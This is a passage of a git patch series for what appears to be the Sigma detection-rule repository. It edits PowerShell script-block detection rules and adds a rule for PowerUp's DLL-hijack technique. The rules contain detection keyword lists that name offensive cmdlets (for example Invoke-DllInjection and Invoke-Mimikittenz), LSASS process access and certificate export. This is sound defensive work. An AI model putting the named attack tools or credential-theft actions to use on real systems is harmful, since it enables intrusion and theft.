.../powershell_invoke_obfuscation_via_use_clip.yml | 2 +- .../powershell_invoke_obfuscation_via_use_mhsta.yml | 2 +- .../powershell_invoke_obfuscation_via_use_rundll32.yml | 2 +- .../powershell/powershell_invoke_obfuscation_via_var++.yml | 2 +- .../powershell_suspicious_export_pfxcertificate.yml | 6 +++--- .../powershell/powershell_suspicious_getprocess_lsass.yml | 6 +++--- .../powershell_suspicious_invocation_specific.yml | 1 + rules/windows/powershell/powershell_suspicious_keywords.yml | 2 +- .../windows/powershell/powershell_suspicious_mail_acces.yml | 2 +- .../powershell_suspicious_mounted_share_deletion.yml | 2 +- rules/windows/powershell/powershell_suspicious_recon.yml | 2 +- rules/windows/powershell/powershell_winlogon_helper_dll.yml | 2 +- rules/windows/powershell/powershell_wmimplant.yml | 2 +- 29 files changed, 32 insertions(+), 31 deletions(-) rename rules/windows/{powershell/powershell_suspicious_profile_create.yml => file_event/sysmon_suspicious_powershell_profile_create.yml} (100%) diff --git a/rules/windows/powershell/powershell_suspicious_profile_create.yml b/rules/windows/file_event/sysmon_suspicious_powershell_profile_create.yml similarity index 100% rename from rules/windows/powershell/powershell_suspicious_profile_create.yml rename to rules/windows/file_event/sysmon_suspicious_powershell_profile_create.yml diff --git a/rules/windows/powershell/powershell_CL_Invocation_LOLScript.yml b/rules/windows/powershell/powershell_CL_Invocation_LOLScript.yml index 3976c19f..054cd341 100644 --- a/rules/windows/powershell/powershell_CL_Invocation_LOLScript.yml +++ b/rules/windows/powershell/powershell_CL_Invocation_LOLScript.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_CL_Invocation_LOLScript_v2.yml b/rules/windows/powershell/powershell_CL_Invocation_LOLScript_v2.yml index 5cd1d3ad..246803a0 100644 --- a/rules/windows/powershell/powershell_CL_Invocation_LOLScript_v2.yml +++ b/rules/windows/powershell/powershell_CL_Invocation_LOLScript_v2.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection2: EventID: 4104 diff --git a/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript.yml b/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript.yml index a9e742a2..3430cdd7 100644 --- a/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript.yml +++ b/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_accessing_win_api.yml b/rules/windows/powershell/powershell_accessing_win_api.yml index aa74974e..f7ed287e 100644 --- a/rules/windows/powershell/powershell_accessing_win_api.yml +++ b/rules/windows/powershell/powershell_accessing_win_api.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_adrecon_execution.yml b/rules/windows/powershell/powershell_adrecon_execution.yml index f041ac68..af2ba36a 100644 --- a/rules/windows/powershell/powershell_adrecon_execution.yml +++ b/rules/windows/powershell/powershell_adrecon_execution.yml @@ -14,7 +14,7 @@ date: 2021/07/16 logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_automated_collection.yml b/rules/windows/powershell/powershell_automated_collection.yml index d482a22b..d19a88ea 100644 --- a/rules/windows/powershell/powershell_automated_collection.yml +++ b/rules/windows/powershell/powershell_automated_collection.yml @@ -12,7 +12,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection_eventid: EventID: 4104 diff --git a/rules/windows/powershell/powershell_bad_opsec_artifacts.yml b/rules/windows/powershell/powershell_bad_opsec_artifacts.yml index 0479fcd1..98ec3052 100644 --- a/rules/windows/powershell/powershell_bad_opsec_artifacts.yml +++ b/rules/windows/powershell/powershell_bad_opsec_artifacts.yml @@ -16,7 +16,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104 , Module Logging must be enable for 4103 detection: selection_4104: EventID: 4104 diff --git a/rules/windows/powershell/powershell_decompress_commands.yml b/rules/windows/powershell/powershell_decompress_commands.yml index bdef59f8..19028f6a 100644 --- a/rules/windows/powershell/powershell_decompress_commands.yml +++ b/rules/windows/powershell/powershell_decompress_commands.yml @@ -13,7 +13,7 @@ references: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: selection1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_get_clipboard.yml b/rules/windows/powershell/powershell_get_clipboard.yml index 26282f89..542c432c 100644 --- a/rules/windows/powershell/powershell_get_clipboard.yml +++ b/rules/windows/powershell/powershell_get_clipboard.yml @@ -13,7 +13,7 @@ references: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: selection1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_clip+.yml b/rules/windows/powershell/powershell_invoke_obfuscation_clip+.yml index 8438323a..45c57fa3 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_clip+.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_clip+.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104 , Module Logging must be enabled for 4103 detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml b/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml index dd5771b8..9b030a97 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_stdin+.yml b/rules/windows/powershell/powershell_invoke_obfuscation_stdin+.yml index f1969a38..a8b5d343 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_stdin+.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_stdin+.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_var+.yml b/rules/windows/powershell/powershell_invoke_obfuscation_var+.yml index 61e5ee7e..f8476262 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_var+.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_var+.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104,Module Logging must be enabled for 4103 detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_compress.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_compress.yml index 8fde7bb9..165d13d2 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_compress.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_compress.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_rundll.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_rundll.yml index e26c5a29..e47cf4f4 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_rundll.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_rundll.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_clip.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_clip.yml index 5adbdedc..30749fc4 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_clip.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_clip.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_mhsta.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_mhsta.yml index 07f71af3..ceaab349 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_mhsta.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_mhsta.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_rundll32.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_rundll32.yml index cc5e50e6..445355bc 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_rundll32.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_rundll32.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_var++.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_var++.yml index f1d98861..60a0fe2b 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_var++.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_var++.yml @@ -15,7 +15,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml b/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml index 6a621346..b39cf109 100644 --- a/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml +++ b/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml @@ -14,12 +14,12 @@ modified: 2021/08/04 logsource: product: windows service: powershell - definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277' + definition: Script Block Logging must be enable detection: - keywords: + PfxCertificate: EventID: 4104 ScriptBlockText|contains: "Export-PfxCertificate" - condition: keywords + condition: PfxCertificate falsepositives: - Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable) level: high diff --git a/rules/windows/powershell/powershell_suspicious_getprocess_lsass.yml b/rules/windows/powershell/powershell_suspicious_getprocess_lsass.yml index c08f0ca5..eccd3337 100644 --- a/rules/windows/powershell/powershell_suspicious_getprocess_lsass.yml +++ b/rules/windows/powershell/powershell_suspicious_getprocess_lsass.yml @@ -13,12 +13,12 @@ modified: 2021/08/04 logsource: product: windows service: powershell - definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277' + definition: Script Block Logging must be enable detection: - keywords: + select_LSASS: EventID: 4104 ScriptBlockText|contains: 'Get-Process lsass' - condition: keywords + condition: select_LSASS falsepositives: - Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable) level: high diff --git a/rules/windows/powershell/powershell_suspicious_invocation_specific.yml b/rules/windows/powershell/powershell_suspicious_invocation_specific.yml index 39da524b..7ae574e1 100644 --- a/rules/windows/powershell/powershell_suspicious_invocation_specific.yml +++ b/rules/windows/powershell/powershell_suspicious_invocation_specific.yml @@ -11,6 +11,7 @@ date: 2017/03/05 logsource: product: windows service: powershell + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: convert_b64: - '-nop' diff --git a/rules/windows/powershell/powershell_suspicious_keywords.yml b/rules/windows/powershell/powershell_suspicious_keywords.yml index 991dfc3c..35673048 100644 --- a/rules/windows/powershell/powershell_suspicious_keywords.yml +++ b/rules/windows/powershell/powershell_suspicious_keywords.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277. Monitor for EventID 4104' + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: keywords: - "System.Reflection.Assembly.Load($" diff --git a/rules/windows/powershell/powershell_suspicious_mail_acces.yml b/rules/windows/powershell/powershell_suspicious_mail_acces.yml index 13210d4a..18b6b460 100644 --- a/rules/windows/powershell/powershell_suspicious_mail_acces.yml +++ b/rules/windows/powershell/powershell_suspicious_mail_acces.yml @@ -12,7 +12,7 @@ tags: logsource: product: windows service: powershell - definition: EnableScriptBlockLogging must be set to enable + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_suspicious_mounted_share_deletion.yml b/rules/windows/powershell/powershell_suspicious_mounted_share_deletion.yml index c040e3a5..941ef606 100644 --- a/rules/windows/powershell/powershell_suspicious_mounted_share_deletion.yml +++ b/rules/windows/powershell/powershell_suspicious_mounted_share_deletion.yml @@ -12,7 +12,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_suspicious_recon.yml b/rules/windows/powershell/powershell_suspicious_recon.yml index 78368cdf..a46b1d1b 100644 --- a/rules/windows/powershell/powershell_suspicious_recon.yml +++ b/rules/windows/powershell/powershell_suspicious_recon.yml @@ -12,7 +12,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection_eventid: EventID: 4104 diff --git a/rules/windows/powershell/powershell_winlogon_helper_dll.yml b/rules/windows/powershell/powershell_winlogon_helper_dll.yml index 026d8240..d15724be 100644 --- a/rules/windows/powershell/powershell_winlogon_helper_dll.yml +++ b/rules/windows/powershell/powershell_winlogon_helper_dll.yml @@ -10,7 +10,7 @@ references: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_wmimplant.yml b/rules/windows/powershell/powershell_wmimplant.yml index 8ff61cde..ec0915ff 100644 --- a/rules/windows/powershell/powershell_wmimplant.yml +++ b/rules/windows/powershell/powershell_wmimplant.yml @@ -14,7 +14,7 @@ date: 2020/03/26 logsource: product: windows service: powershell - definition: "Script block logging must be enabled" + definition: Script block logging must be enabled detection: selection: ScriptBlockText|contains: From 0fb6c35b1fe80decd09cccdeae23abf24497e222 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 21 Aug 2021 09:58:58 +0200 Subject: [PATCH 0484/1367] Cleanup PS rules --- .../sysmon_powershell_code_injection.yml} | 0 .../powershell_CL_Mutexverifiers_LOLScript_v2.yml | 2 +- .../powershell/powershell_create_local_user.yml | 2 +- .../powershell/powershell_data_compressed.yml | 2 +- .../powershell/powershell_dnscat_execution.yml | 2 +- .../powershell/powershell_icmp_exfiltration.yml | 2 +- .../powershell/powershell_invoke_nightmare.yml | 2 +- .../powershell_invoke_obfuscation_via_stdin.yml | 2 +- .../powershell/powershell_malicious_commandlets.yml | 12 +++++------- .../win_powershell_cmdline_reversed_strings.yml} | 0 .../win_powershell_cmdline_special_characters.yml} | 0 ...win_powershell_cmdline_specific_comb_methods.yml} | 0 12 files changed, 12 insertions(+), 14 deletions(-) rename rules/windows/{powershell/powershell_code_injection.yml => create_remote_thread/sysmon_powershell_code_injection.yml} (100%) rename rules/windows/{powershell/powershell_cmdline_reversed_strings.yml => process_creation/win_powershell_cmdline_reversed_strings.yml} (100%) rename rules/windows/{powershell/powershell_cmdline_special_characters.yml => process_creation/win_powershell_cmdline_special_characters.yml} (100%) rename rules/windows/{powershell/powershell_cmdline_specific_comb_methods.yml => process_creation/win_powershell_cmdline_specific_comb_methods.yml} (100%) diff --git a/rules/windows/powershell/powershell_code_injection.yml b/rules/windows/create_remote_thread/sysmon_powershell_code_injection.yml similarity index 100% rename from rules/windows/powershell/powershell_code_injection.yml rename to rules/windows/create_remote_thread/sysmon_powershell_code_injection.yml diff --git a/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript_v2.yml b/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript_v2.yml index 8a0fa3a3..cc7de5f4 100644 --- a/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript_v2.yml +++ b/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript_v2.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection2: EventID: 4104 diff --git a/rules/windows/powershell/powershell_create_local_user.yml b/rules/windows/powershell/powershell_create_local_user.yml index 6fd05f5c..29961866 100644 --- a/rules/windows/powershell/powershell_create_local_user.yml +++ b/rules/windows/powershell/powershell_create_local_user.yml @@ -17,7 +17,7 @@ modified: 2021/08/04 logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_data_compressed.yml b/rules/windows/powershell/powershell_data_compressed.yml index ada73d64..72ba0304 100644 --- a/rules/windows/powershell/powershell_data_compressed.yml +++ b/rules/windows/powershell/powershell_data_compressed.yml @@ -10,7 +10,7 @@ references: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_dnscat_execution.yml b/rules/windows/powershell/powershell_dnscat_execution.yml index 63a590f3..bfe388a4 100644 --- a/rules/windows/powershell/powershell_dnscat_execution.yml +++ b/rules/windows/powershell/powershell_dnscat_execution.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_icmp_exfiltration.yml b/rules/windows/powershell/powershell_icmp_exfiltration.yml index c6e83568..a9d9036a 100644 --- a/rules/windows/powershell/powershell_icmp_exfiltration.yml +++ b/rules/windows/powershell/powershell_icmp_exfiltration.yml @@ -12,7 +12,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_nightmare.yml b/rules/windows/powershell/powershell_invoke_nightmare.yml index 9d7443ed..64e93f5a 100644 --- a/rules/windows/powershell/powershell_invoke_nightmare.yml +++ b/rules/windows/powershell/powershell_invoke_nightmare.yml @@ -9,7 +9,7 @@ author: Max Altgelt, Tobias Michalski logsource: product: windows service: powershell - definition: It is recommended to use the new "Script Block Logging" of PowerShell v5. + definition: Script Block Logging must be enable detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_stdin.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_stdin.yml index 5b638d94..330912c9 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_stdin.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_stdin.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104, Module Logging must be enable for 4103 detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_malicious_commandlets.yml b/rules/windows/powershell/powershell_malicious_commandlets.yml index ad4609d8..34c4ccb0 100644 --- a/rules/windows/powershell/powershell_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_malicious_commandlets.yml @@ -10,13 +10,13 @@ tags: - attack.t1086 #an old one author: Sean Metcalf (source), Florian Roth (rule), Bartlomiej Czyz @bczyz1 (update), oscd.community (update) date: 2017/03/05 -modified: 2020/10/11 +modified: 2021/08/21 logsource: product: windows service: powershell - definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277' + definition: Script Block Logging must be enable detection: - keywords: + select_Malicious: EventID: 4104 ScriptBlockText|contains: - "Invoke-DllInjection" @@ -115,10 +115,8 @@ detection: - "Invoke-Mimikittenz" - "Invoke-AllChecks" false_positives: - EventID: 4104 - ScriptBlockText|contains: - - Get-SystemDriveInfo # http://bheltborg.dk/Windows/WinSxS/amd64_microsoft-windows-maintenancediagnostic_31bf3856ad364e35_10.0.10240.16384_none_91ef7543a4514b5e/CL_Utility.ps1 - condition: keywords and not false_positives + ScriptBlockText|contains: Get-SystemDriveInfo # http://bheltborg.dk/Windows/WinSxS/amd64_microsoft-windows-maintenancediagnostic_31bf3856ad364e35_10.0.10240.16384_none_91ef7543a4514b5e/CL_Utility.ps1 + condition: select_Malicious and not false_positives falsepositives: - Penetration testing level: high diff --git a/rules/windows/powershell/powershell_cmdline_reversed_strings.yml b/rules/windows/process_creation/win_powershell_cmdline_reversed_strings.yml similarity index 100% rename from rules/windows/powershell/powershell_cmdline_reversed_strings.yml rename to rules/windows/process_creation/win_powershell_cmdline_reversed_strings.yml diff --git a/rules/windows/powershell/powershell_cmdline_special_characters.yml b/rules/windows/process_creation/win_powershell_cmdline_special_characters.yml similarity index 100% rename from rules/windows/powershell/powershell_cmdline_special_characters.yml rename to rules/windows/process_creation/win_powershell_cmdline_special_characters.yml diff --git a/rules/windows/powershell/powershell_cmdline_specific_comb_methods.yml b/rules/windows/process_creation/win_powershell_cmdline_specific_comb_methods.yml similarity index 100% rename from rules/windows/powershell/powershell_cmdline_specific_comb_methods.yml rename to rules/windows/process_creation/win_powershell_cmdline_specific_comb_methods.yml From 2f683b9ab79604228b4dfd5113467ab90b370457 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 21 Aug 2021 10:00:48 +0200 Subject: [PATCH 0485/1367] fix powershell_clear_powershell_history error --- .../windows/powershell/powershell_clear_powershell_history.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_clear_powershell_history.yml b/rules/windows/powershell/powershell_clear_powershell_history.yml index ff01b153..430e9305 100644 --- a/rules/windows/powershell/powershell_clear_powershell_history.yml +++ b/rules/windows/powershell/powershell_clear_powershell_history.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 4104 Script block logging must be enabled , 4103 Module Logging must be enabled + definition: 4104 Script block logging must be enabled , 4103 Module Logging must be enabled detection: selection_1: EventID: 4104 From 42c90b9d20e4dad422b5b46e50a4944480641cac Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 21 Aug 2021 10:05:47 +0200 Subject: [PATCH 0486/1367] fix powershell_psattack error --- rules/windows/powershell/powershell_psattack.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_psattack.yml b/rules/windows/powershell/powershell_psattack.yml index 78690987..8e178cb4 100644 --- a/rules/windows/powershell/powershell_psattack.yml +++ b/rules/windows/powershell/powershell_psattack.yml @@ -19,7 +19,7 @@ detection: selection: EventID: 4104 ScriptBlockText|contains: 'PS ATTACK!!!' - condition: all of them + condition: selection falsepositives: - Pentesters level: high From fba54b8d6921ec26d85b688e4e98f0134291730e Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Sat, 21 Aug 2021 17:47:56 +0530 Subject: [PATCH 0487/1367] First Rule commit --- .../sysmon_detect_powerup_dllhijacking.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml diff --git a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml new file mode 100644 index 00000000..de9640df --- /dev/null +++ b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml @@ -0,0 +1,24 @@ +title: Powerup Write Hijack DLL detection +id: 602a1f13-c640-4d73-b053-be9a2fa58b96 +status: experimental +description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default). Reference: https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/ +author: pbssubhash +date: 2021/08/21 +modified: 2021/08/21 +tags: + - attack.persistence + - attack.privilege_escalation + - attack.defense_evasion + - attack.t1574.001 +logsource: + category: file_event + product: windows +detection: + selection: + Image|endswith: '\powershell.exe' + File.path|endswith: '.bat' + condition: selection +falsepositives: + - Pentest + - Any powershell script that creates bat files # highly unlikely (untested) +level: high From a415463f5b71d9ce8378eb8ef1e3802b08d3ea4a Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Sat, 21 Aug 2021 19:37:28 +0530 Subject: [PATCH 0488/1367] Modified rule --- .../file_event/sysmon_detect_powerup_dllhijacking.yml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml index de9640df..326fb189 100644 --- a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml +++ b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml @@ -1,10 +1,9 @@ title: Powerup Write Hijack DLL detection id: 602a1f13-c640-4d73-b053-be9a2fa58b96 status: experimental -description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default). Reference: https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/ +description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default). Reference - https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/ author: pbssubhash date: 2021/08/21 -modified: 2021/08/21 tags: - attack.persistence - attack.privilege_escalation @@ -16,7 +15,7 @@ logsource: detection: selection: Image|endswith: '\powershell.exe' - File.path|endswith: '.bat' + TargetFilename|endswith: '.bat' condition: selection falsepositives: - Pentest From 73c953d633b1433ba3e19f3512543098acdb7037 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 21 Aug 2021 16:18:16 +0200 Subject: [PATCH 0489/1367] Fix title --- rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml index 326fb189..8006f002 100644 --- a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml +++ b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml @@ -1,4 +1,4 @@ -title: Powerup Write Hijack DLL detection +title: Powerup Write Hijack DLL id: 602a1f13-c640-4d73-b053-be9a2fa58b96 status: experimental description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default). Reference - https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/ From eee497f656bc470c45363a99fe5fa9404e584dc2 Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Sat, 21 Aug 2021 20:04:03 +0530 Subject: [PATCH 0490/1367] Title modification --- rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml index 326fb189..8006f002 100644 --- a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml +++ b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml @@ -1,4 +1,4 @@ -title: Powerup Write Hijack DLL detection +title: Powerup Write Hijack DLL id: 602a1f13-c640-4d73-b053-be9a2fa58b96 status: experimental description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default). Reference - https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/ From a44206bfa04a0357d5c223eee63bffd6e86725bb Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 21 Aug 2021 17:33:39 +0200 Subject: [PATCH 0491/1367] Some cleanup --- .../file_event/sysmon_detect_powerup_dllhijacking.yml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml index 8006f002..702dcf29 100644 --- a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml +++ b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml @@ -1,7 +1,12 @@ title: Powerup Write Hijack DLL id: 602a1f13-c640-4d73-b053-be9a2fa58b96 status: experimental -description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting 